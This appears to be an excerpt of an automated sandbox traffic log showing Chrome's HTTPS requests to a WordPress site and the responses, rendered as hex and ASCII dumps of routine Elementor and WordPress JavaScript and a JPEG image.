                                                                                                                                                                                                                              2024-10-23 18:04:12 UTC1369INData Raw: 6c 65 6d 65 6e 74 73 48 61 6e 64 6c 65 72 73 5b 65 5d 3b 72 65 74 75 72 6e 20 69 73 43 6c 61 73 73 48 61 6e 64 6c 65 72 28 74 29 3f 74 3a 6e 65 77 20 50 72 6f 6d 69 73 65 28 28 65 3d 3e 7b 74 28 29 2e 74 68 65 6e 28 28 74 3d 3e 7b 6c 65 74 7b 64 65 66 61 75 6c 74 3a 6e 7d 3d 74 3b 65 28 6e 29 7d 29 29 7d 29 29 7d 2c 74 68 69 73 2e 67 65 74 48 61 6e 64 6c 65 72 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 6c 65 6d 65 6e 74 6f 72 44 65 76 54 6f 6f 6c 73 2e 64 65 70 72 65 63 61 74 69 6f 6e 2e 64 65 70 72 65 63 61 74 65 64 28 22 67 65 74 48 61 6e 64 6c 65 72 73 22 2c 22 33 2e 31 2e 30 22 2c 22 65 6c 65 6d 65 6e 74 6f 72 46 72 6f 6e 74 65 6e 64 2e 65 6c 65 6d 65 6e 74 73 48 61 6e 64 6c 65 72 2e 67 65 74 48 61 6e 64 6c 65 72 22 29 2c 65 3f
                                                                                                                                                                                                                              Data Ascii: lementsHandlers[e];return isClassHandler(t)?t:new Promise((e=>{t().then((t=>{let{default:n}=t;e(n)}))}))},this.getHandlers=function(e){return elementorDevTools.deprecation.deprecated("getHandlers","3.1.0","elementorFrontend.elementsHandler.getHandler"),e?
                                                                                                                                                                                                                              2024-10-23 18:04:12 UTC1369INData Raw: 65 6d 65 6e 74 6f 72 46 72 6f 6e 74 65 6e 64 2e 69 73 45 64 69 74 4d 6f 64 65 28 29 26 26 77 69 6e 64 6f 77 2e 74 6f 70 2e 65 6c 65 6d 65 6e 74 6f 72 44 65 76 54 6f 6f 6c 73 2e 64 65 70 72 65 63 61 74 69 6f 6e 2e 64 65 70 72 65 63 61 74 65 64 28 22 65 6c 65 6d 65 6e 74 6f 72 46 72 6f 6e 74 65 6e 64 2e 63 6f 6e 66 69 67 2e 6c 65 67 61 63 79 4d 6f 64 65 2e 65 6c 65 6d 65 6e 74 57 72 61 70 70 65 72 73 22 2c 22 33 2e 31 2e 30 22 29 2c 21 31 7d 7d 2c 74 68 69 73 2e 70 6f 70 75 6c 61 74 65 41 63 74 69 76 65 42 72 65 61 6b 70 6f 69 6e 74 73 43 6f 6e 66 69 67 28 29 7d 67 65 74 20 4d 6f 64 75 6c 65 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 69 73 45 64 69 74 4d 6f 64 65 28 29 26 26 70 61 72 65 6e 74 2e 65 6c 65 6d 65 6e 74 6f 72 44 65 76 54 6f 6f 6c 73 2e 64 65
                                                                                                                                                                                                                              Data Ascii: ementorFrontend.isEditMode()&&window.top.elementorDevTools.deprecation.deprecated("elementorFrontend.config.legacyMode.elementWrappers","3.1.0"),!1}},this.populateActiveBreakpointsConfig()}get Module(){return this.isEditMode()&&parent.elementorDevTools.de
                                                                                                                                                                                                                              2024-10-23 18:04:12 UTC1369INData Raw: 6f 64 65 5b 30 5d 2c 22 3a 61 66 74 65 72 22 29 2e 63 6f 6e 74 65 6e 74 2e 72 65 70 6c 61 63 65 28 2f 22 2f 67 2c 22 22 29 7d 67 65 74 44 65 76 69 63 65 53 65 74 74 69 6e 67 28 65 2c 74 2c 6e 29 7b 69 66 28 22 77 69 64 65 73 63 72 65 65 6e 22 3d 3d 3d 65 29 72 65 74 75 72 6e 20 74 68 69 73 2e 67 65 74 57 69 64 65 73 63 72 65 65 6e 53 65 74 74 69 6e 67 28 74 2c 6e 29 3b 63 6f 6e 73 74 20 6f 3d 65 6c 65 6d 65 6e 74 6f 72 46 72 6f 6e 74 65 6e 64 2e 62 72 65 61 6b 70 6f 69 6e 74 73 2e 67 65 74 41 63 74 69 76 65 42 72 65 61 6b 70 6f 69 6e 74 73 4c 69 73 74 28 7b 6c 61 72 67 65 54 6f 53 6d 61 6c 6c 3a 21 30 2c 77 69 74 68 44 65 73 6b 74 6f 70 3a 21 30 7d 29 3b 6c 65 74 20 73 3d 6f 2e 69 6e 64 65 78 4f 66 28 65 29 3b 66 6f 72 28 3b 73 3e 30 3b 29 7b 63 6f 6e 73
                                                                                                                                                                                                                              Data Ascii: ode[0],":after").content.replace(/"/g,"")}getDeviceSetting(e,t,n){if("widescreen"===e)return this.getWidescreenSetting(t,n);const o=elementorFrontend.breakpoints.getActiveBreakpointsList({largeToSmall:!0,withDesktop:!0});let s=o.indexOf(e);for(;s>0;){cons
                                                                                                                                                                                                                              2024-10-23 18:04:12 UTC1369INData Raw: 69 6e 67 73 28 22 73 65 6c 65 63 74 6f 72 73 2e 61 64 6d 69 6e 42 61 72 22 29 29 7d 61 64 64 55 73 65 72 41 67 65 6e 74 43 6c 61 73 73 65 73 28 29 7b 66 6f 72 28 63 6f 6e 73 74 5b 65 2c 74 5d 6f 66 20 4f 62 6a 65 63 74 2e 65 6e 74 72 69 65 73 28 72 2e 64 65 66 61 75 6c 74 29 29 74 26 26 74 68 69 73 2e 65 6c 65 6d 65 6e 74 73 2e 24 62 6f 64 79 2e 61 64 64 43 6c 61 73 73 28 22 65 2d 2d 75 61 2d 22 2b 65 29 7d 73 65 74 44 65 76 69 63 65 4d 6f 64 65 44 61 74 61 28 29 7b 74 68 69 73 2e 65 6c 65 6d 65 6e 74 73 2e 24 62 6f 64 79 2e 61 74 74 72 28 22 64 61 74 61 2d 65 6c 65 6d 65 6e 74 6f 72 2d 64 65 76 69 63 65 2d 6d 6f 64 65 22 2c 74 68 69 73 2e 67 65 74 43 75 72 72 65 6e 74 44 65 76 69 63 65 4d 6f 64 65 28 29 29 7d 61 64 64 4c 69 73 74 65 6e 65 72 4f 6e 63 65
                                                                                                                                                                                                                              Data Ascii: ings("selectors.adminBar"))}addUserAgentClasses(){for(const[e,t]of Object.entries(r.default))t&&this.elements.$body.addClass("e--ua-"+e)}setDeviceModeData(){this.elements.$body.attr("data-elementor-device-mode",this.getCurrentDeviceMode())}addListenerOnce
                                                                                                                                                                                                                              2024-10-23 18:04:12 UTC1369INData Raw: 6c 65 72 73 3d 7b 7d 2c 74 68 69 73 2e 61 64 64 55 73 65 72 41 67 65 6e 74 43 6c 61 73 73 65 73 28 29 2c 74 68 69 73 2e 73 65 74 44 65 76 69 63 65 4d 6f 64 65 44 61 74 61 28 29 2c 74 68 69 73 2e 69 6e 69 74 44 69 61 6c 6f 67 73 4d 61 6e 61 67 65 72 28 29 2c 74 68 69 73 2e 69 73 45 64 69 74 4d 6f 64 65 28 29 26 26 74 68 69 73 2e 6d 75 74 65 4d 69 67 72 61 74 69 6f 6e 54 72 61 63 65 73 28 29 2c 70 2e 64 65 66 61 75 6c 74 2e 64 69 73 70 61 74 63 68 28 74 68 69 73 2e 65 6c 65 6d 65 6e 74 73 2e 24 77 69 6e 64 6f 77 2c 22 65 6c 65 6d 65 6e 74 6f 72 2f 66 72 6f 6e 74 65 6e 64 2f 69 6e 69 74 22 29 2c 74 68 69 73 2e 69 6e 69 74 4d 6f 64 75 6c 65 73 28 29 2c 74 68 69 73 2e 69 6e 69 74 4f 6e 52 65 61 64 79 45 6c 65 6d 65 6e 74 73 28 29 2c 74 68 69 73 2e 69 6e 69 74
                                                                                                                                                                                                                              Data Ascii: lers={},this.addUserAgentClasses(),this.setDeviceModeData(),this.initDialogsManager(),this.isEditMode()&&this.muteMigrationTraces(),p.default.dispatch(this.elements.$window,"elementor/frontend/init"),this.initModules(),this.initOnReadyElements(),this.init
                                                                                                                                                                                                                              2024-10-23 18:04:12 UTC1369INData Raw: 6f 6e 2c 73 74 6f 70 4f 6e 4c 61 73 74 53 6c 69 64 65 3a 21 65 2e 62 61 63 6b 67 72 6f 75 6e 64 5f 73 6c 69 64 65 73 68 6f 77 5f 6c 6f 6f 70 7d 2c 68 61 6e 64 6c 65 45 6c 65 6d 65 6e 74 6f 72 42 72 65 61 6b 70 6f 69 6e 74 73 3a 21 30 2c 6f 6e 3a 7b 73 6c 69 64 65 43 68 61 6e 67 65 3a 28 29 3d 3e 7b 65 2e 62 61 63 6b 67 72 6f 75 6e 64 5f 73 6c 69 64 65 73 68 6f 77 5f 6b 65 6e 5f 62 75 72 6e 73 26 26 74 68 69 73 2e 68 61 6e 64 6c 65 4b 65 6e 42 75 72 6e 73 28 29 7d 7d 7d 3b 73 77 69 74 63 68 28 22 79 65 73 22 3d 3d 3d 65 2e 62 61 63 6b 67 72 6f 75 6e 64 5f 73 6c 69 64 65 73 68 6f 77 5f 6c 6f 6f 70 26 26 28 74 2e 6c 6f 6f 70 65 64 53 6c 69 64 65 73 3d 74 68 69 73 2e 67 65 74 53 6c 69 64 65 73 43 6f 75 6e 74 28 29 29 2c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 5f
                                                                                                                                                                                                                              Data Ascii: on,stopOnLastSlide:!e.background_slideshow_loop},handleElementorBreakpoints:!0,on:{slideChange:()=>{e.background_slideshow_ken_burns&&this.handleKenBurns()}}};switch("yes"===e.background_slideshow_loop&&(t.loopedSlides=this.getSlidesCount()),e.background_
                                                                                                                                                                                                                              2024-10-23 18:04:12 UTC1369INData Raw: 27 22 29 3b 27 7d 29 3b 6e 2e 61 70 70 65 6e 64 28 6f 29 2c 73 2e 61 70 70 65 6e 64 28 6e 29 2c 74 68 69 73 2e 65 6c 65 6d 65 6e 74 73 2e 24 73 6c 69 64 65 73 3d 74 68 69 73 2e 65 6c 65 6d 65 6e 74 73 2e 24 73 6c 69 64 65 73 2e 61 64 64 28 6e 29 7d 29 29 2c 6f 2e 61 70 70 65 6e 64 28 73 29 2c 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 70 72 65 70 65 6e 64 28 6f 29 2c 74 68 69 73 2e 65 6c 65 6d 65 6e 74 73 2e 24 62 61 63 6b 67 72 6f 75 6e 64 53 6c 69 64 65 53 68 6f 77 43 6f 6e 74 61 69 6e 65 72 3d 6f 7d 61 73 79 6e 63 20 69 6e 69 74 53 6c 69 64 65 72 28 29 7b 69 66 28 31 3e 3d 74 68 69 73 2e 67 65 74 53 6c 69 64 65 73 43 6f 75 6e 74 28 29 29 72 65 74 75 72 6e 3b 63 6f 6e 73 74 20 65 3d 74 68 69 73 2e 67 65 74 45 6c 65 6d 65 6e 74 53 65 74 74 69 6e 67 73 28
                                                                                                                                                                                                                              Data Ascii: '");'});n.append(o),s.append(n),this.elements.$slides=this.elements.$slides.add(n)})),o.append(s),this.$element.prepend(o),this.elements.$backgroundSlideShowContainer=o}async initSlider(){if(1>=this.getSlidesCount())return;const e=this.getElementSettings(


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              132192.168.2.649871141.193.213.104431424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:12 UTC903OUTGET /wp-content/uploads/2020/11/footer-tall.jpg HTTP/1.1
                                                                                                                                                                                                                              Host: www.tacinc.org
                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                                                                                              Referer: https://www.tacinc.org/wp-content/uploads/elementor/css/post-7.css
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                              Cookie: _pk_id.42744.d7a4=9e2e685fff1c48d6.1729706647.1.1729706647.1729706647.; _pk_ses.42744.d7a4=1; _gid=GA1.2.1313925292.1729706650; _gat_UA-26451691-1=1; _ga_VZFP9C0M5Y=GS1.1.1729706650.1.0.1729706650.0.0.0; _ga=GA1.1.2026524419.1729706650
                                                                                                                                                                                                                              2024-10-23 18:04:12 UTC481INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:12 GMT
                                                                                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                                                                                              Content-Length: 7417
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                              Cf-Bgj: imgq:100,h2pri
                                                                                                                                                                                                                              Cf-Polished: status=not_needed
                                                                                                                                                                                                                              ETag: "66f49c51-1cf9"
                                                                                                                                                                                                                              Last-Modified: Wed, 25 Sep 2024 23:27:13 GMT
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                              Age: 613461
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                              CF-RAY: 8d73a5f21af82cd4-DFW
                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                              2024-10-23 18:04:12 UTC888INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 07 07 07 07 07 07 08 08 08 08 0b 0b 0a 0b 0b 10 0e 0d 0d 0e 10 18 11 12 11 12 11 18 24 16 1a 16 16 1a 16 24 20 26 1f 1d 1f 26 20 39 2d 27 27 2d 39 42 37 34 37 42 4f 47 47 4f 64 5f 64 83 83 b0 01 07 07 07 07 07 07 08 08 08 08 0b 0b 0a 0b 0b 10 0e 0d 0d 0e 10 18 11 12 11 12 11 18 24 16 1a 16 16 1a 16 24 20 26 1f 1d 1f 26 20 39 2d 27 27 2d 39 42 37 34 37 42 4f 47 47 4f 64 5f 64 83 83 b0 ff c2 00 11 08 01 b8 05 a0 03 01 22 00 02 11 01 03 11 01 ff c4 00 1b 00 01 00 03 01 01 01 01 00 00 00 00 00 00 00 00 00 00 02 03 04 01 06 05 08 ff da 00 08 01 01 00 00 00 00 fd 22 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                              Data Ascii: JFIF$$ && 9-''-9B747BOGGOd_d$$ && 9-''-9B747BOGGOd_d""
                                                                                                                                                                                                                              2024-10-23 18:04:12 UTC1369INData Raw: 00 00 00 00 76 fb fa 47 35 15 00 00 00 00 00 00 00 23 9e 00 00 00 00 29 cf 44 00 f5 80 00 00 00 00 00 00 00 00 11 ad c0 00 00 00 00 00 00 02 8a 40 00 00 01 ca 73 d1 10 07 ac 00 00 00 00 00 00 00 00 05 39 e8 e2 56 5d 30 00 00 00 00 00 00 2a a3 80 00 00 03 94 67 a3 80 01 eb 00 00 00 00 00 00 00 00 08 66 a2 00 27 6d b2 00 00 00 00 00 00 47 3c 00 00 00 0e 51 9e 8e 00 00 f5 80 00 00 00 00 00 00 00 14 66 a4 00 16 5d 68 00 00 00 00 00 14 d0 00 00 00 55 96 88 80 00 1e b0 00 00 00 00 00 00 00 11 cb 44 00 00 12 b6 e9 00 00 00 00 00 21 9e 20 00 00 11 cf 96 b0 00 00 7a c0 00 00 00 00 00 00 01 4e 6a a2 00 00 05 97 5a 00 00 00 00 06 7a 80 00 00 2b c9 9f 80 00 00 3d 60 00 00 00 00 00 00 03 3e 5a c0 00 00 04 ee b8 00 00 00 00 aa 8e 00 00 00 cf 96 90 00 00 03 d6 00 00 00
                                                                                                                                                                                                                              Data Ascii: vG5#)D@s9V]0*gf'mG<Qf]hUD! zNjZz+=`>Z
                                                                                                                                                                                                                              2024-10-23 18:04:12 UTC1369INData Raw: 5d 00 00 00 f2 80 00 be a0 00 00 00 03 6f 40 de 96 00 00 00 79 40 01 5d 28 00 00 00 00 55 80 be 9a 00 00 00 3c a0 01 7d 40 00 00 00 02 e8 0d e9 a5 00 00 00 1e 50 03 7a d0 00 00 00 00 db d0 2e c1 40 00 00 0f 28 02 ba e8 00 00 00 00 db d0 6f 4d 01 40 00 00 1e 50 0d ec 00 00 00 00 0b a0 67 60 03 40 00 00 7f ff c4 00 1a 01 01 00 03 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 06 04 05 ff da 00 08 01 03 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 22 9a 00 00 00 00 00 00 00 00 00 00 02 b4 a3 d0 00 00 00 00 00 00 00 00 00 00 45 73 81 e8 00 00 00 00 00 00 00 00 00 00 8a 66 07 a0 00 00 00 00 00 00 00 00 00 08 ce 80 1e 80 00 00 00 00 00 00 00 ac 2b 11 04 48 4a b4 99 99 03 d0 00 00 00 00 00 00 0a d6 b5 ad 62 00 01 14 a0 4a 6d
                                                                                                                                                                                                                              Data Ascii: ]o@y@](U<}@Pz.@(oM@Pg`@"Esf+HJbJm
                                                                                                                                                                                                                              2024-10-23 18:04:12 UTC1369INData Raw: e8 f5 a8 eb 93 18 b6 9a 89 e4 67 ee 95 f0 20 88 19 5b 23 e1 97 c2 e1 73 20 43 5e 98 ef 86 d8 7e 91 1a d3 55 bb c0 85 d9 b3 63 e1 cd 51 57 2c 4c 67 66 cc fa 54 54 71 93 18 96 a6 41 75 c3 fe c5 ad 4f cf 78 08 3e 08 58 01 89 8d 5a 98 ef 86 d2 3b 94 c6 b4 b9 ca e1 0d 47 6c d8 f8 8b 3a ac 67 66 f4 d0 25 72 24 44 b4 54 4e f0 44 5b 58 ef 11 5d 4e 47 b6 b3 aa 8c c0 86 d1 4c 65 8c 36 93 92 ac 35 aa 1f ab 6c 21 24 e7 e2 6c ea b9 98 f5 19 b2 c0 7a 80 54 71 93 18 b6 82 01 04 6d 16 b2 37 7f 63 bb f5 24 08 d5 e9 af bf fc 8d 69 3f 48 de 35 5a 8d df b6 1e 2c 48 51 89 8d 54 9c 17 d4 aa ee bf 29 22 2d a9 d7 3b 8f bc 5a f4 db e6 c3 b0 17 0b 99 02 1b 4a 8c 81 31 ad 15 1b 2c 21 66 6c c9 3e 30 f5 40 c1 61 25 8d e4 93 e0 6c e8 9f 33 01 1a d2 83 e5 bc c6 b4 b9 f9 6e 11 9d df e6
                                                                                                                                                                                                                              Data Ascii: g [#s C^~UcQW,LgfTTqAuOx>XZ;Gl:gf%r$DTND[X]NGLe65l!$lzTqm7c$i?H5Z,HQT)"-;ZJ1,!fl>0@a%l3n
                                                                                                                                                                                                                              2024-10-23 18:04:12 UTC1369INData Raw: fa 25 ea 77 2e ff 00 e6 ae c9 94 4a 8a de c7 e1 d4 b4 22 60 bf ec 7f 11 dd dc de c7 d2 8f 51 10 62 71 f2 8f 55 df d8 79 7a 24 90 05 e6 3b 96 c0 65 f0 92 a3 2e 78 88 ae ad 91 ff 00 37 a8 88 2f 63 8f 94 a9 5d de f1 92 f9 7a 50 90 a2 f2 40 12 a5 a6 fc 13 78 49 27 d1 2c e1 04 67 2c 6f 3f 10 12 22 55 c8 36 f0 10 45 e3 f5 24 01 79 20 09 52 d3 98 4d e1 24 92 49 bc fa 52 a5 64 4c 33 3e 51 dd dc de c7 fa f4 53 b8 5c 06 26 12 49 bc fc 75 76 5c 8c 4a 8a d9 e0 65 4a e8 98 66 de 51 ea 3d 43 7b 1f eb d2 8c c1 45 e4 80 25 4b 41 6c 13 01 e7 df e8 b7 a9 98 5d fb 0b 32 a0 bd 88 02 54 b4 33 60 98 0f cc 5a 8c be e2 2b 06 18 7a 4e a5 65 4c 33 6f 28 ee ce 6f 63 e8 a2 40 04 98 ee 5b 01 80 ec 35 2b aa 60 31 68 ce ce 6f 63 fa 82 44 4a bd cd bf a4 09 0a 2f 24 01 2a 5a 09 c1 30 1e
                                                                                                                                                                                                                              Data Ascii: %w.J"`QbqUyz$;e.x7/c]zP@xI',g,o?"U6E$y RM$IRdL3>QS\&Iuv\JeJfQ=C{E%KAl]2T3`Z+zNeL3o(oc@[5+`1hocDJ/$*Z0
                                                                                                                                                                                                                              2024-10-23 18:04:12 UTC1053INData Raw: 49 a5 98 78 98 4d f8 1e 21 46 68 61 42 14 26 90 f5 31 d7 c2 c2 a7 ef 81 9a 4e 26 8a cd 04 d0 f3 1a 33 09 eb 72 2a b3 43 34 1e d8 50 20 07 89 85 85 67 6d ec 16 14 58 50 f6 c2 81 30 1e 3f 78 56 60 37 a2 96 61 43 db 0a 87 af 2c aa c0 0f 04 17 b1 0a 2e ce 51 61 40 ef 00 3b 79 80 b0 03 c0 2a b0 a7 2c 2a 1e b6 62 ab 0a 10 03 cd c2 c2 a1 d7 28 b0 a1 00 3b 1b 30 2f a8 53 96 00 7a f3 ca cc 07 54 a2 f6 21 43 db 00 3b 1b 39 55 85 02 06 3c f0 58 01 d4 c2 c2 ab de 15 0d 9c 85 57 bc 2a 1b 09 5e a0 2f 62 14 3d c0 0d 9c 16 14 7d c0 0f 5b 08 2c 00 e9 95 58 54 3b ed 00 b0 a7 30 03 62 2b d3 2a b0 a0 6d 1f 2b 0a 73 00 0d 88 16 00 74 81 61 40 da 4a 2f 78 00 6c 61 30 1d 10 56 14 0e fb 49 45 85 43 64 2b d1 05 85 39 9f 01 b4 02 b0 a0 6c 80 b0 03 a2 51 60 06 d2 51 7e 59 f0 1b 20
                                                                                                                                                                                                                              Data Ascii: IxM!FhaB&1N&3r*C4P gmXP0?xV`7aC,.Qa@;y*,*b(;0/SzT!C;9U<XW*^/b=}[,XT;0b+*m+sta@J/xla0VIECd+9lQ`Q~Y


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              133192.168.2.649873141.193.213.114431424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:12 UTC656OUTGET /wp-content/uploads/hummingbird-assets/2041663b2e746e59e63362466c21f79b.js HTTP/1.1
                                                                                                                                                                                                                              Host: www.tacinc.org
                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                              Cookie: _pk_id.42744.d7a4=9e2e685fff1c48d6.1729706647.1.1729706647.1729706647.; _pk_ses.42744.d7a4=1; _gid=GA1.2.1313925292.1729706650; _gat_UA-26451691-1=1; _ga_VZFP9C0M5Y=GS1.1.1729706650.1.0.1729706650.0.0.0; _ga=GA1.1.2026524419.1729706650
                                                                                                                                                                                                                              2024-10-23 18:04:12 UTC492INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:12 GMT
                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Last-Modified: Wed, 16 Oct 2024 14:55:48 GMT
                                                                                                                                                                                                                              ETag: W/"670fd3f4-34aa"
                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                              Age: 614822
                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                              CF-RAY: 8d73a5f22b920bf3-DFW
                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                              2024-10-23 18:04:12 UTC877INData Raw: 33 34 61 61 0d 0a 2f 2a 2a 68 61 6e 64 6c 65 73 3a 77 70 2d 68 6f 6f 6b 73 2c 77 70 2d 69 31 38 6e 2a 2a 2f 0d 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 28 28 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 74 3d 7b 64 3a 28 65 2c 6e 29 3d 3e 7b 66 6f 72 28 76 61 72 20 72 20 69 6e 20 6e 29 74 2e 6f 28 6e 2c 72 29 26 26 21 74 2e 6f 28 65 2c 72 29 26 26 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 72 2c 7b 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 67 65 74 3a 6e 5b 72 5d 7d 29 7d 2c 6f 3a 28 74 2c 65 29 3d 3e 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 74 2c 65 29 2c 72 3a 74 3d 3e 7b
                                                                                                                                                                                                                              Data Ascii: 34aa/**handles:wp-hooks,wp-i18n**//*! This file is auto-generated */(()=>{"use strict";var t={d:(e,n)=>{for(var r in n)t.o(n,r)&&!t.o(e,r)&&Object.defineProperty(e,r,{enumerable:!0,get:n[r]})},o:(t,e)=>Object.prototype.hasOwnProperty.call(t,e),r:t=>{
                                                                                                                                                                                                                              2024-10-23 18:04:12 UTC1369INData Raw: 74 20 62 65 20 61 20 6e 6f 6e 2d 65 6d 70 74 79 20 73 74 72 69 6e 67 2e 22 29 2c 21 31 29 3a 21 21 2f 5e 5b 61 2d 7a 41 2d 5a 5d 5b 61 2d 7a 41 2d 5a 30 2d 39 5f 2e 5c 2d 5c 2f 5d 2a 24 2f 2e 74 65 73 74 28 74 29 7c 7c 28 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 22 54 68 65 20 6e 61 6d 65 73 70 61 63 65 20 63 61 6e 20 6f 6e 6c 79 20 63 6f 6e 74 61 69 6e 20 6e 75 6d 62 65 72 73 2c 20 6c 65 74 74 65 72 73 2c 20 64 61 73 68 65 73 2c 20 70 65 72 69 6f 64 73 2c 20 75 6e 64 65 72 73 63 6f 72 65 73 20 61 6e 64 20 73 6c 61 73 68 65 73 2e 22 29 2c 21 31 29 7d 3b 63 6f 6e 73 74 20 72 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 22 73 74 72 69 6e 67 22 21 3d 74 79 70 65 6f 66 20 74 7c 7c 22 22 3d 3d 3d 74 3f 28 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28
                                                                                                                                                                                                                              Data Ascii: t be a non-empty string."),!1):!!/^[a-zA-Z][a-zA-Z0-9_.\-\/]*$/.test(t)||(console.error("The namespace can only contain numbers, letters, dashes, periods, underscores and slashes."),!1)};const r=function(t){return"string"!=typeof t||""===t?(console.error(
                                                                                                                                                                                                                              2024-10-23 18:04:12 UTC1369INData Raw: 3b 65 2d 2d 29 74 5b 65 5d 2e 6e 61 6d 65 73 70 61 63 65 3d 3d 3d 73 26 26 28 74 2e 73 70 6c 69 63 65 28 65 2c 31 29 2c 6c 2b 2b 2c 63 2e 5f 5f 63 75 72 72 65 6e 74 2e 66 6f 72 45 61 63 68 28 28 74 3d 3e 7b 74 2e 6e 61 6d 65 3d 3d 3d 69 26 26 74 2e 63 75 72 72 65 6e 74 49 6e 64 65 78 3e 3d 65 26 26 74 2e 63 75 72 72 65 6e 74 49 6e 64 65 78 2d 2d 7d 29 29 29 7d 72 65 74 75 72 6e 22 68 6f 6f 6b 52 65 6d 6f 76 65 64 22 21 3d 3d 69 26 26 74 2e 64 6f 41 63 74 69 6f 6e 28 22 68 6f 6f 6b 52 65 6d 6f 76 65 64 22 2c 69 2c 73 29 2c 6c 7d 7d 3b 63 6f 6e 73 74 20 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 6e 2c 72 29 7b 63 6f 6e 73 74 20 6f 3d 74 5b 65 5d 3b 72 65 74 75 72 6e 20 76 6f 69 64 20 30 21 3d 3d 72 3f 6e
                                                                                                                                                                                                                              Data Ascii: ;e--)t[e].namespace===s&&(t.splice(e,1),l++,c.__current.forEach((t=>{t.name===i&&t.currentIndex>=e&&t.currentIndex--})))}return"hookRemoved"!==i&&t.doAction("hookRemoved",i,s),l}};const s=function(t,e){return function(n,r){const o=t[e];return void 0!==r?n
